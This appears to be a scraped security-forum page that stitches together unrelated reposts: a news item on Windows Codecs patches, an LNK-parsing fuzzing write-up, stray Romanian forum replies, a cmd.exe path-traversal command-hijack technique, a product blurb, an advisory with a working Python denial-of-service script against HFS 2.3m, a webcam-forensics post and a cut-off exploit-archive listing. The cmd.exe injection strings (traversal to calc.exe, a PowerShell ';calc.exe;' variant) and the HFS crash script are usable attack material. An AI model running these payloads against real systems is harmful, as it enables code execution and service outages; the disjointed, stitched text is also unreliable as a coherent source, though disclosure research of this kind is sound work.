The patches fix two separate RCE bugs in Windows Codecs that allow hackers to exploit playback of multimedia files. Microsoft has quietly pushed out two emergency security updates to fix remote code execution bugs in Microsoft Windows Codecs Library. Windows Codecs Library handles how the OS compresses large multimedia files such as photos and videos, and then decodes them for playback within applications. The out-of-band updates, addressing a critical-severity flaw (CVE-2020-1425) and important-severity vulnerability (CVE-2020-1457), were sent out via Windows Update Tuesday night and affect several versions of Windows 10 and Windows Server 2019. Both vulnerabilities allow for remote code execution “in the way that Microsoft Windows Codecs Library handles objects in memory,” according to the updates. CVE-2020-1425, if exploited, could allow an attacker to execute arbitrary code, while CVE-2020-1457 can be exploited to allow a bad actor to obtain information that would further compromise the user’s system. Both flaws can be exploited if users of affected systems open corrupted media files within applications that use the native Windows Codecs Library. Microsoft included a complete list of the Windows 10 and Windows Server distributions affected in its advisories, which offered little in terms of specific detail on the flaws. The company did say, however, that there are no mitigations or workarounds for the vulnerabities. Affected customers need to take no action to receive the update, as they will be automatically updated by Microsoft Store, according to the company. Alternatively, customers who want to receive the update immediately can check for updates with the Microsoft Store App. Microsoft credited security researcher Abdul-Aziz Hariri for identifying the flaws and reporting them to Trend Micro’s Zero Day Initiative (ZDI), according to a published report in ZDNet. It’s not completely uncommon for Microsoft to release updates outside of the second Tuesday of every month, also known as “Patch Tuesday.” However, typically the company does so in response to vulnerabilities uncovered by third-party security researchers—including from rivals such as Google — that are found to be under attack. Microsoft said it has not detected either Windows Codecs Library flaw being exploited in the wild. These patches come weeks after Microsoft’s regularly scheduled June Patch Tuesday, where it released patches for 129 vulnerabilities – the highest number of CVEs ever released by Microsoft in a single month. Within the blockbuster security update, 11 critical remote code-execution flaws were patched in Windows, SharePoint server, Windows Shell, VBScript and other products. Unlike other recent monthly updates from Microsoft, its June updates did not include any zero-day vulnerabilities being actively attacked in the wild. Via threatpost.com

https://wordpress.org/plugins/woo-distance-based-fee/ Ii iei KM din bord si verifici in caz de te arde la combustibil

Ciudat, domeniul este creat in zilele anterioare Creation Date: 2020-06-15T11:27:45Z In aceeasi zi de luni

Shell Link Binary File Format, which contains information that can be used to access another data object. The Shell Link Binary File Format is the format of Windows files with the extension "LNK", we call it a shortcut file. Regarding the structure of this format is very complicated, Microsoft has provided a document about LNK file format for reference[1]. I've followed the Microsoft patches for a long time. In 2018, I found that they had 2 LNK bugs which were fixed and all of them were RCE. Recently, @Lays found a bunch of LNK file parsing bugs, so with this binary file format I think it is suitable for fuzzing. However, you need to reverse and learn how to handle this LNK file on Windows. Introduction File Explorer, previously known as Windows Explorer, is a file manager application that has been included with releases of the Microsoft Windows operating system from Windows 95 onwards. It provides a graphical user interface for accessing the file systems. It is also the component of the operating system that presents many user interface items on the screen such as the taskbar and desktop. Explorer has a lot of features, each version of the operating system has been upgraded it by Microsoft. Here I discovered that the Explorer will automatically parsing the LNK file if the LNK file appears in the context that the Explorer is accessing. For example, if we are on the desktop, the Explorer will parse the LNK files that appear on the desktop and maybe in some secondary directory (about the depth of the folder that the Explorer can access, I don't know). Introduce parsing LNK file in Explorer How can we build an arsenal to fuzz this LNK file format? We need to rely on Explorer, debug it, use Windbg attach to process explorer.exe: I put break-point at 2 functions are CreateFileA and CreateFileW, I guess that Explorer will use it to read the file before parsing. After a few breaks on the CreateFileW function, I saw the explorer calling the CreateFileW function with the file "Process Hacker 2.lnk", this LNK file is on the desktop. I view the call stack at this breakpoint: We can see that a series of APIs related to CShellLink are called in the windows.storage.dll. Here I returned to MSDN to learn about these CShellLink related API and I found this[2]: It is possible to create an LNK parsing program using the IShellLink interface. Based on what MSDN provides I use IPersistFile to load and parsing LNK files, this is the harness I use to fuzzing. I debug the test with the harness that I built on the file "test_debug.lnk" Comparing the call stack between my harness and Explorer looks quite similar. I decided to use this harness for fuzzing. Fuzzing LNK Corpus for this LNK file I found is also quite available on the Github repo. I found and downloaded, then used them to fuzz. With the familiar winafl[3] and Dynamorio[4], I used it with coverage_module windows.storage.dll. Run fuzzing with 1 master and 7 slave. About fuzzing and coverage, you can read my blogs before[5][6]. After some time running fuzzing, I went back to check my crashes, I found 4 unique crashes: Out of bound read in windows_storage!CRegFolder::_AttributesOf Out of bound read in windows_storage!CRegFolder::_CreateCachedRegFolder Out of bound read in shell32!CControlPanelCategoryFolder::_IsValidCategoryPidl Double free in windows_storage!DSA_DestroyCallback I checked these 4 crashes on Explorer, only double-free bug can cause explorer.exe crash, 3 out of bound read bugs do not cause explorer.exe crash. I reported all 4 bugs to Microsoft, Microsoft only accepted one of my double-free bug, they rejected the rest because the crash did not occur on the default configuration of the system and could not be exploited (regarding the default configuration of the system, I think due to the harness I use is not complete like Explorer when parsing 1 LNK file). CVE-2020-1299 The double-free bug I found above was fixed in this June patch of Microsoft, here is a bit of the cause of this bug: We have struct DSA as follows: DSA object: struct DSA { INT nItemCount; LPVOID pData; INT nMaxCount; INT nItemSize; INT nGrow; }; DSA object[7] is initialized at DSA_Create[8] and insert items with DSA_InsertItem[9]. While inserting additional items, it will allocate a memory area for the pData field in the struct DSA. When releasing DSA object, the program has called DSA_DestroyCallback function twice to release the same DSA object. The function s_DestroyCacheItemCB has an error: When freeing the pData field, it did not check the availability of this memory, resulting in a double-free bug. The pData memory has been free before, I don't analyze further why the DSA object was destroyed twice due to some condition in the previous thread. For this bug, we can use after free on the DSA object to trigger RCE. Conclusion Above is the whole process I researched to find an attack surface for the LNK file, apply fuzzing to find fault of the LNK parsing process. At the time I found this bug, I only targeted the windows.storage.dll DLL without knowing that LNK had another type: LNK search (after ZDI published blog which analyzed a bug of @Lays, I realized this format)[10]. In addition to windows.storage.dll used to parsing LNK files, there are also windows.storage.search.dll and StructuredQuery.dll. The following blog I will talk about some bugs I found in StructuredQuery.dll but Microsoft does not fix it although it may cause DOS temporarily. Microsoft suggests that I can blog about those bugs and they are confident that they can answer every customer's questions with bugs they don't fix. https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-shllink/16cb4ca1-9339-4d0c-a68d-bf1d6cc0f943 https://docs.microsoft.com/en-us/windows/win32/shell/links https://github.com/googleprojectzero/winafl https://github.com/DynamoRIO/dynamorio https://ezqelusia.blogspot.com/2020/05/start-fuzzing-fuzz-various-image-viewers.html https://ezqelusia.blogspot.com/2020/05/microsofts-first-bug.html https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/ https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dsa_create [https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dsa_insertitem https://www.zerodayinitiative.com/blog/2020/3/25/cve-2020-0729-remote-code-execution-through-lnk-files Researcher: linhlhq from Infiniti Team - VinCSS (a member of Vingroup). Source

si cum bei bere cu botnita pe mufa? Cam pe cand?

Se refera la asta https://hackaday.com/2017/07/29/injecting-code-into-mouse-firmware-should-be-your-next-hack/ back-up si montat partitiile in VM cu tot cu rat ba

ideal ar fi (repet), nu stergi tot, faci back-up re-install (off-line) rulezi partitiile pe VM scan(off-line) scotiti tot ce este samples in carantina postezi in Sectiunea Tehnica poate cineva are timp si de un 0day

back-up, rootkit scan, re-install, , apropo, ce Sistem de Operare utilizezi?

Salut, stie cineva daca mai exista pager (Semafoon) cu acoperire pe teritoriul Romaniei (Orange, Vodafone... etc) Ce am gasit sunt smart ceasuri, Multumesc

This one is about an interesting behavior I identified in cmd.exe in result of many weeks of intermittent (private time, every now and then) research in pursuit of some new OS Command Injection attack vectors. So I was mostly trying to: find an encoding missmatch between some command check/sanitization code and the rest of the program, allowing to smuggle the ASCII version of the existing command separators in the second byte of a wide char (for a moment I believed I had it in the StripQuotes function - I was wrong ¯\(ツ)/¯), discover some hidden cmd.exe's counterpart of the unix shells' backtick operator, find a command separator alternative to |, & and \n - which long ago resulted in the discovery of an interesting and still alive, but very rarely occurring vulnerability - https://vuldb.com/?id.93602. And I eventually ended up finding a command/argument confusion with path traversal ... or whatever the fuck this is For the lazy with no patience to read the whole thing, here comes the magic trick: Tested on Windows 10 Pro x64 (Microsoft Windows [Version 10.0.18363.836]), cmd.exe version: 10.0.18362.449 (SHA256: FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5). But should work with earlier versions as well... probably with all versions. Some more context Let's consider the following command line: cmd.exe /c "ping 127.0.0.1", whereas 127.0.0.1 is the argument controlled by the user in an application that runs an external command (in this sample case it's ping). This exact syntax - with the command being preceded with the /c switch and enclosed in double quotes - is the default way cmd.exe is used by external programs to execute system commands (e.g. PHP shell_exec() function and its variants). Now, the user can trick cmd.exe into running calc.exe instead of ping.exe by providing an argument like 127.0.0.1/../../../../../../../../../../windows/system32/calc.exe, traversing the path to the executable of their choice, which cmd.exe will run instead of the ping.exe binary. So the full command line becomes: cmd.exe /c "ping 127.0.0.1/../../../../../../../../../../windows/system32/calc.exe" The potential impact of this includes Denial of Service, Information Disclosure, Arbitrary Code Execution (depending on the target application and system). Although I am fairly sure there are some other scenarios with OS command execution whereas a part of the command line comes from a different security context than the final command is executed with (Some services maybe? I haven't search myself yet) - anyway let's use a web application as an example. Consider the following sample PHP code: Due to the use of escapeshellcmd() it is not vulnerable to known command injection vectors (except for argument injection, but that's a slightly different story and does not allow RCE with the list of arguments ping.exe supports - no built-in execution arguments like find's -exec). And I know, I know, some of you will point out that in this case escapeshellarg() should be used instead - and yup, you would be right, especially since putting the argument in quotes in fact prevents this behavior, as in such case cmd.exe properly identifies the command to run (ping.exe). The trick does not work when the argument is enclosed in single/double quotes. Anyway - the use of escapeshellcmd() instead of escapeshellarg() is very common. Noticed that while - after finding and registering CVE-2020-12669, CVE-2020-12742 and CVE-2020-12743 ended up spending one more week running automated source code analysis scans against more open source projects and manually following up the results - using my old evil SCA tool for PHP. Also that's what made me fed up with PHP again quite quickly, forcing me to get back to cmd.exe only to let me finally discover what this blog post is mostly about. I am fairly sure there are applications vulnerable to this (doing OS command injection sanity checks, but failing to prevent path traversal and enclose the argument in quotes). Haven't searched yet because I am way too lazy/busy. Also, the notion of similar behavior in other command interpreters is also worth entertaining. An extended POC Normal use: Abuse: Now, this is what normal use looks like in Sysmon log (process creation event): So basically the child process (ping.exe) is created with command line equal to the value enclosed between the double quotes preceded by the /c switch from the parent process (cmd.exe) command line. Now, the same for the above ipconfig.exe hijack: And it turns out we are not limited to executables located in directories present in %PATH%. We can traverse to any location on the same disk. Also, we are not limited to the EXE extension, neither to the list of "executable" extensions contained in the %PATHEXT% variable (which by default is .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC - basically these are the extensions cmd.exe will try to add to the name of the command if no extension is provided, e.g. when ping is used instead of explicit ping.exe). cmd.exe runs stuff regardless to the extension, something I noticed long ago (https://twitter.com/julianpentest/status/1203386223227572224). And one more thing - more additional arguments between the original command and the smuggled executable path can be added. Let's see all of this combined. For the demonstrative purposes, the following C program was compiled and linked into a PE executable (it simply prints out its own command line): Copied the EXE into C:\xampp\tmp\cmd.png (consider this as an example of ANY location a malicious user could write a file). Action: So we just effectively achieved an equivalent of actual (exec, not just read) PE Local File Inclusion in an otherwise-safe PHP ping script. But I don't think that our options end here. The potential for extending this into a full RCE without chaining with file upload/control I am certain it is also possible to turn this into an RCE even without the possibility of fully/partially controlling any file in the target file system and deliver the payload in the command line itself, thus creating a sort of polymorphic malicious command line payload. When running the target executable, cmd.exe passes to it the entire part of the command line following the /c switch. For instance: cmd.exe /c "ping 127.0.0.1/../../../../../../../windows/system32/calc.exe" executes c:\windows\system32\calc.exe with command line equal ping 127.0.0.1/../../../../../../../windows/system32/calc.exe . And, as presented in the extended POC, it is possible to hijack the executable even when providing multiple arguments, leading to command lines like: ping THE PLACE FOR THE RCE PAYLOAD ARGS 127.0.0.1/../../path/to/lol.bin This is the command line lol.bin would be executed with. Finding a proxy execution LOLBin tolerant enough to invalid arguments (since we as attackers cannot fully control them) could turn this into a full RCE. The LOLBin we need is one accepting/ignoring the first argument (which is the hardcoded command we cannot control, in our example "ping"), while also willing to accept/ignore the last one (which is the traversed path to itself). Something like https://lolbas-project.github.io/lolbas/Binaries/Ieexec/, but actually accepting multiple arguments while quietly ignoring the incorrect ones. Also, I was thinking of powershell. Running this: cmd.exe /c "ping ;calc.exe; 127.0.0.1/../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/POWERSHELL.EXE" makes powershell start with command line of ping ;calc.exe 127.0.0.1/../../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/POWERSHELL.EXE I expected it to treat the command line as a string of inline commands and run calc.exe after running ping.exe. Yes, I know, a semicolon is used here to separate ping from calc - but the semicolon character is NOT a command separator in cmd.exe, while it is in powershell (on the other hand almost all OS Command Injection filters block it anyway, as they are written universally with multiple platforms in mind - cause obviously the semicolon IS a command separator in unix shells). A perfect supported syntax here would be some sort of simple base64-encoded code injection like powershell's -EncodedCommand, having found a way to make it work even when preceded with a string we cannot control. Anyway, this attempt led to powershell running in interactive mode instead of treating the command line as a sequence of inline commands to execute. Anyway, at this point turning this into an RCE boils down to researching the behaviors of particular LOLbins, focusing on the way they process their command line, rather than researching cmd.exe itself (although yes, I also thought about self-chaining and abusing cmd.exe as the LOLbin for this, in hope for taking advantage of some nuances between the way it parses its command line when it does and when it does not start with the /c switch). Stumbling upon and some analysis I know this looks silly enough to suggest I found it while ramming that sample PHP code over HTTP with Burp while watching Procmon with proper filters... or something like that (which isn't such a bad idea by the way)... as opposed to writing a custom cmd.exe fuzzer (no, you don't need to tell me my code is far away from elegant, I couldn't care less), then after obtaining rather boring and disappointing results, spending weeks on static analysis with Ghidra (thanks NSA, I am literally in love with this tool), followed up with more weeks of further work with Ghidra while simultaneously manually debugging with x64dbg while further expanding comments in the Ghidra project 😂 cmd.exe command line processing starts in the CheckSwitches function (which gets called from Init, which itself gets called from main). CheckSwitches is responsible for determining what switches (like /c, /k, /v:on etc.) cmd.exe was called with. The full list of options can be found in cmd.exe /? help (which by the way, to my surprise, reflects the actual functionality pretty well). I spent a good deal of time analyzing it carefully, looking for hidden switches, logic issues allowing to smuggle multiple switches via the command line by jumping out of the double quotes, quote-stripping issues and whatever else would just manifest to me as I dug in. The beginning of the CheckSwitches function after some naming editions and notes I took If the /c switch is detected, processing moves to the actual command line enclosed in double quotes - which is the most common mode cmd.exe is used and the only one the rest of this write-up is about: The same mode can be attained with the /r switch: After some further logic, doing, among other things, parsing the quoted string and making some sanity fixes (like removing any spaces if any found from its beginning), a function with a very encouraging and self-explanatory name is called: Disassembly view: Decompiler view: At this point it was clear it was high time for debugging to come into play. By default x64dbg will set up a breakpoint at the entry point - mainCRTStartup. This is a good opportunity to set an arbitrary command line: Then start cmd.exe once again (Debug-> Restart). We also set up a breakpoint on the top of the SearchForExecutable function, so we catch all its instances. We run into the first instance of SearchForExecutable: We can see that the double-quoted proper command line (after cmd.exe skips the preceding cmd.exe /c) along with its double quotes is held in RBX and R15. Also, the value on the top of the stack (right bottom corner) contains an address pointing at CheckSwitches - it's the saved RET. So we know this instance is called from CheckSwitches. If we hit F9 again, we will run into the second instance of SearchForExecutable, but this time the command line string is held in RAX, RDI and R11, while the call originates from another function named ECWork: This second instance resolves and returns the full path to ping.exe. Below we can see the body of the ECWork function, with a call to SearchForExecutable (marked black). This is where the RIP was at when the screenshot was taken - right before the second call of SearchForExecutable: Now, on below screenshot the SearchForExecutable call already returned (note the full path to ping.exe pointed at with the address held in R14). Fifteen instructions later the ExecPgm function is called, using the newly resolved executable path to create the new process: So - seeing SearchForExecutable being called against the whole ping 127.0.0.1 string (uh yeah, those evil spaces) suggests potential confusion between the full command line and an actual file name... So this gave me the initial idea to check whether the executable could be hijacked by literally creating one under a name equal to the command line that would make it run: Uh really? Interesting. I decided to have a look with Procmon in order to see what file names cmd.exe attempts to open with CreateFile: So yes, the result confirmed opening a copy of calc.exe from the file literally named ping .PNG in the current working directory: Now, interestingly, I would not see any results with this Procmon filter (Operation = CreateFile) if I did not create the file first... One would expect to see cmd.exe mindlessly calling CreateFile against nonexistent files with names being various mutations of the command line, with NAME NOT FOUND result - the usual way one would search for potential DLL side loading issues... But NOT in this case - cmd.exe actually checks whether such file exists before calling CreateFile, by calling QueryDirectory instead: For this purpose, in Procmon, it is more accurate to specify a filter based on the payload's unique magic string (like PNG in this case, as this would be the string we as attackers could potentially control) occurring in the Path property instead of filtering based on the Operation. "So, anyway, this isn't very useful" - I thought and got back to x64dbg. "We can only hijack the command if we can literally write a file under a very dodgy name into the target application's current directory... " - I kept thinking - "... Current directory... u sure ONLY current directory?" - and at this point my path traversal reflex lit up, a seemingly crazy and desperate idea to attempt traversal payloads against parts of the command line parsed by SearchForExecutable. Which made me manually change the command line to ping 127.0.0.1/../calc.exe and restart debugging... while already thinking of modifying the cmd.exe fuzzer in order to throw a set payloads generated for this purpose with psychoPATH against cmd.exe... But that never happened because of what I saw after I hit F9 one more time. Below we can see x64dbg with cmd.exe ran with cmd.exe /c "ping 127.0.0.1/../calc.exe" command line (see RDI). We are hanging right after the second SearchForExecutable call, the one originating from the bottom of the ECWork function. Just few instructions before calling ExecPgm, which is about to execute the PE pointed by R14. The full path to C:\Windows\System32\calc.exe present R14 is the result of the just-returned SearchForExecutable("ping 127.0.0.1/../calc.exe") call preceding the current RIP: The traversal appears to be relative to a subdirectory of the current working directory (calc.exe is at c:\windows\system32\calc.exe😞 "Or maybe this is just a result of a failed path traversal sanity check, only removing the first occurrence of ../?" - I kept wondering. So I dug further into the SearchForExecutable function, also trying to find the answer why variants of the argument created by splitting it by spaces are considered and why the most-to-the-right one is chosen first when found. I narrowed down the culprit code to the instructions within the SearchForExecutable function, between the call of mystrcspn at 14000ff64 and then the call of the FullPath function at 14001005b and exists_ex at 140010414: In the meantime I received the following feedback from Microsoft: We do have a blog post that helps describe the behavior you have documented: https://docs.microsoft.com/en-us/dotnet/standard/io/file-path-formats. Cmd.exe first tries to interpret the whole string as a path: "ping 127.0.0.1/../../../../../../../../../../windows/system32/calc.exe” string is being treated as a relative path, so “ping 127.0.0.1” is interpreted as a segment in that path, and is removed due to the preceding “../” this should help explain why you shouldn’t be able to use the user controlled input string to pass arguments to the executable. There are a lot a cases that would require that behaviour, e.g. cmd.exe /c "....\Program Files (x86)\Internet Explorer\iexplore.exe" we wouldn’t want that to try to run some program “....\Program” with the argument “Files (x86)\Internet Explorer\iexplore.exe”. It’s only if the full string can’t be resolved to a valid path, that it splits on spaces and takes everything before the first space as the intended executable name (hence why “ping 127.0.0.1” does work). So yeah... those evil spaces and quoting. From this point, I only escalated the issue by confirming the possibility of traversing to arbitrary directories as well as the ability to force execution of PE files with arbitrary extensions. Interestingly, this slightly resembles the common unquoted service path issue, except that in this case the most-to-the-right variant gets prioritized. The disclosure Upon discovery I documented and reported this peculiarity to MSRC. After little less than six days the report was picked up and reviewed. About a week later Microsoft completed their assessment, concluding that this does not meet the bar for security servicing: On one hand, I was little disappointed that Microsoft would not address it and I was not getting the CVE in cmd.exe I have wanted for some time. On the other hand, at least nothing's holding me back from sharing it already and hopefully it will be around for some time so we can play with it It's not a vulnerability, it's a technique I would like thank Microsoft for making all of this possible - and for being nice enough to even offer me a review of this post! Which was completely unexpected, but obviously highly appreciated. Some reflections Researching stuff can sometimes appear to be a lonely and thankless journey, especially after days and weeks of seemingly fruitless drudging and sculpturing - but I realized this is just a short-sighted perception, whereas success is exclusively measured by the number of uncovered vulnerabilities/features/interesting behaviors (no point to argue about the terminology here ). In offensive security we rarely pay attention to the stuff we tried and failed, even though those failed attempts are equally important - as if we did not try, we would never know what's there (and risk false negatives). Curiosity and the need to know. And software is full of surprises. Plus, simply dealing with a particular subject (like analyzing a given program/protocol/format) and gradually getting more and more familiar with it feeds our minds with new mental models, which makes us automatically come up with more and more ideas for potential bugs, scenarios and weird behaviors as we keep hacking. A journey through code accompanied by new inspirations, awarded with new knowledge and the peace of mind resulting from answering questions... sometimes ending with great satisfaction of a unique discovery. Source

Design circuits quickly and easily with a modern and intuitive user interface with drag-and-drop, copy/paste, zoom & more. Take control of debugging by pausing the simulation and watching the signal propagate as you advance step-by-step. Don't worry about multiple platforms on student computers. Install on both Windows and macOS. Demo Download Trial Source

This tool enumerates hostnames from Bing.com for an IP address. Bing.com is Microsoft's search engine which has an IP: search parameter. Written in Bash for Linux. Requires wget. [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/HFS-HTTP-FILE-SERVER-v2.3-REMOTE-BUFFER-OVERFLOW-DoS.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.rejetto.com [Product] HFS Http File Server v2.3m Build 300 [Vulnerability Type] Remote Buffer Overflow (DoS) [CVE Reference] CVE-2020-13432 [Security Issue] rejetto HFS (aka HTTP File Server) v2.3m Build #300, when virtual files or folders are used, allows remote attackers to trigger an invalid-pointer write access violation via concurrent HTTP requests with a long URI or long HTTP headers like Cookie, User-Agent etc. Remote unauthenticated attackers can send concurrent HTTP requests using an incrementing or specific payload range of junk characters for values in the URL parameters or HTTP headers sent to the server. This results in hfs.exe server crash from an invalid pointer write access violation. Requirements: hfs.exe must have at least one saved virtual file or folder present. Test using a remote IP and NOT from the same machine (localhost). Dump... (e4c.3a8): Access violation - code c0000005 (first/second chance not available) For analysis of this file, run !analyze -v WARNING: Stack overflow detected. The unwound frames are extracted from outside normal stack bounds. eax=000a1390 ebx=000a138c ecx=006eb188 edx=001b0000 esi=00000000 edi=00000002 eip=777ef8b4 esp=000a0e0c ebp=000a12cc iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206 ntdll!RtlpResolveAssemblyStorageMapEntry+0x18: 777ef8b4 53 push ebx 0:000> !load winext/msec 0:000> !exploitable WARNING: Stack overflow detected. The unwound frames are extracted from outside normal stack bounds. *** WARNING: Unable to verify checksum for hfs.exe Exploitability Classification: EXPLOITABLE Recommended Bug Title: Exploitable - User Mode Write AV starting at ntdll!RtlpResolveAssemblyStorageMapEntry+0x0000000000000018 (Hash=0x7a29717c.0x325e6a71) PROCESS_NAME: hfs.exe FOLLOWUP_IP: hfs+8fad7 0048fad7 8945f0 mov dword ptr [ebp-10h],eax WRITE_ADDRESS: 000a0e08 [References] https://github.com/rejetto/hfs2/releases/tag/v2.4-rc01 [Exploit/POC] from socket import * import time,sys #HFS HTTP File Server v2.3m build 300. #Vendor: www.rejetto.com #Remote Remote Buffer Overflow DoS #Note: hfs.exe must have at least one saved virtual file or folder on the target #test using a remote IP and not from the same machine. #Discovery: hyp3rlinx #hyp3rlinx.altervista.org #ISR: ApparitionSec #========================================================================= res="" once=0 cnt=0 max_requests=1666 def hfs_dos(): global ip,port,length,res,once,cnt,max_requests cnt+=1 length += 1 payload = "A"*length try: s=socket(AF_INET, SOCK_STREAM) s.settimeout(2) s.connect((ip,port)) ##bof ="HEAD / HTTP/1.1\r\nHost: "+ip+"Cookie: "+payload+"\r\n\r\n" bof ="HEAD /?mode="+payload+" HTTP/1.1\r\nHost: "+ip+"\r\n\r\n" s.send(bof.encode("utf-8")) if once==0: once+=1 res = s.recv(128) if res != "": print("Targets up please wait...") if "HFS 2.3m" not in str(res): print("[!] Non vulnerable HFS version, exiting :(") exit() except Exception as e: if e != None: if str(e).find("timed out")!=-1: if res=="": print("[!] Target is not up or behind a firewall? :(") exit() else: print("[!] Done!") exit() s.close() if cnt == max_requests: return False return True def msg(): print("HFS HTTP File Server v2.3m build 300.") print("Unauthenticated Remote Buffer Overflow (DoS - PoC)") print("Virtual HFS saved file or folder required.") print("Run from a different machine (IP) than the target.") print("By Hyp3rlinx - ApparitionSec\n") if __name__=="__main__": length=3 if len(sys.argv) != 3: msg() print("Usage: <hfs.exe Server>, <Port (usually 8080)>") exit() ip = sys.argv[1] port = int(sys.argv[2]) msg() while True: if not hfs_dos(): print("[!] Failed, non vuln version or no virtual files exist :(") break [POC Video URL] https://www.youtube.com/watch?v=qQ-EawfXuWY [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: May 18, 2020 Vendor reply: May 18, 2020 Vendor confirm vulnerability: May 19, 2020 Vendor creates fix: May 20, 2020 Vendor released new version 2.4 : June 7, 2020 June 8, 2020 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx Source

In certain investigations, it may arise that you need to find the following: What process was using the camera or microphone? When was the last session? How long was that session? Using the contents of the following reg keys, you can to determine when and how long a process had access to privacy protected resources. These resources include the microphone, webcam, bluetooth, location, contacts and more. For this blog, I will focus on the microphone and webcam as an example. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\webcam\ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\microphone\ Below is an example of the typical entries in the webcam directory. There are several entries including Microsoft and non-Microsoft applications Microsoft applications are stored in as child keys but non-Microsoft applications (which are of the most interest) are stored in the NonPackaged child key. Within the NonPackaged directory, you can see that the name of the keys are the full path of an executable with # replacing \. Each entry has two values, LastUsedTimeStart and LastUsedTimeStop, with the timestamps in FILETIME format. From the example above, you are able to determine, Zoom.exe had access to my webcam for 27.2 minutes (between 2020/06/01 04:30:52 UTC and 2020/06/01 04:58:04 UTC). Whether you are looking at what processes had access to a webcam or even trying to prove long a user’s conversation may have been, this is a great source of information. Testing RAT-like behaviour I needed to test if this also applied to more malicious methods of accessing the microphone. I used a meterpreter post-exploit module to record audio from Windows VM. As soon as I ran the recording command, a new entry was populated from where my meterpreter shell was executed. Pretty cool! Monitoring If we wanted to track all sessions (not just the last), it is easy with Sysmon. If you are running something like the Swift on Security configuration, you will need to add an inclusion line for event id 12,13 and 14 (Registry modification): <TargetObject condition="contains">SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\</TargetObject> <!-- When a process accesses bluetooth, location, webcam, microphone etc, the timestamps of last access are updated here. HKLM and HCKU --> After updating your configuration, a Sysmon event will now be created when the registry keys are created or updated. Below is the LastUsedTime key being updated for Skype.exe accessing my microphone in the Sysmon event log. The timestamp in the log are still in hex which needs to be coverted to decimal then to a human readable timestamp, however the timestamp of the event itself is also very accurate. Conclusion What spurred this off is when I came across this page in the settings, and it got me thinking on where this data is stored. It will be interesting if there are other places that track historical sessions without the use of monitoring. This would be more valuable to forensic analysts that don’t always have nice logs. Further research also could be done to identify which device the process is accessing (front camera, USB camera etc). I would also like to explore if this method catches more covert RAT malware. Thanks for reading, Source Zach

This archive contains all of the 166 exploits added to Packet Storm in May, 2020 Content: Directory of \202005-exploits\202005-exploits\2005-exploits 06/02/2020 07:13 AM <DIR> . 06/02/2020 07:13 AM <DIR> .. 05/21/2020 07:37 PM 1,121 absolutetelnet1121-dos.txt 05/15/2020 05:53 PM 5,758 ACal_v2.2.6-1Click-RCE.py.txt 05/04/2020 08:19 PM 1,021 addressbook9001-sql.txt 05/01/2020 04:44 PM 1,138 apacheofbiz171203-xsrf.txt 05/27/2020 07:18 PM 405 bindtsig-dos.txt 05/02/2020 10:22 PM 1,606 blogengine33-xxe.txt 05/04/2020 07:32 PM 1,014 boltwire603-lfi.txt 05/06/2020 05:37 PM 945 bookedscheduler277-traversal.txt 05/07/2020 06:20 PM 1,183 carparkms10-sql.txt 05/12/2020 11:09 PM 1,284 ciscodnac1314-xss.txt 05/20/2020 11:06 PM 5,210 cloudme1112seh-overflow.txt 05/11/2020 06:33 PM 1,212 complaintms10-sql.txt 05/21/2020 01:02 AM 2,738 composrcms10030-xss.txt 05/07/2020 06:30 PM 1,606 cpm107-xss.txt 05/20/2020 06:57 PM 3,316 craftcms3vcard-exec.txt 05/29/2020 06:46 PM 3,397 crystalshard020-bypass.txt 05/16/2020 12:32 AM 4,845 CSNC-2010-001.txt 05/11/2020 06:32 PM 1,454 cutenews212-filedelete.txt 05/12/2020 11:07 PM 3,887 cutenews212-upload.txt 05/01/2020 10:22 PM 2,873 CVE-2020-1967-master.zip 05/08/2020 11:03 PM 15,526 cve_2020_0668_service_tracing.rb.txt 05/14/2020 11:53 PM 2,107 damewarers1211273-overflow.txt 05/19/2020 02:55 AM 2,684 dolibarr1103-xss.txt 05/22/2020 05:39 PM 2,055 druvainsync663-escalate.txt 05/12/2020 11:18 PM 5,034 druva_insync_insynccphwnet64_rcp_type_5_priv_esc.rb.txt 05/14/2020 11:57 PM 3,901 ecommercesys10-exec.txt 05/28/2020 07:09 PM 1,331 eyoucms146-xss.txt 05/17/2020 01:22 PM 853 filetto10-dos.txt 05/02/2020 12:22 PM 1,155 flashget196-overflow.txt 05/18/2020 05:22 AM 1,239 formalms2302-xss.txt 05/21/2020 07:35 PM 1,793 formalms5640-xsrf.txt 05/04/2020 08:07 PM 3,204 Frigate_v3.36_SEH_Buffer_Overflow.py.txt 05/06/2020 05:32 PM 10,536 gitlab1290-fileread.txt 05/24/2020 01:11 PM 3,541 goldwave570seh-overflow.txt 05/01/2020 04:53 PM 5,461 GS20200501135300.tgz 05/08/2020 11:12 PM 7,870,938 GS20200508201239.tgz 05/08/2020 11:14 PM 7,734 GS20200508201435.tgz 05/08/2020 11:22 PM 8,844 GS20200508202219.txt 05/12/2020 05:45 PM 5,255 GS20200512144520.tgz 05/12/2020 11:14 PM 17,445 GS20200512201356.tgz 05/12/2020 11:15 PM 9,637,250 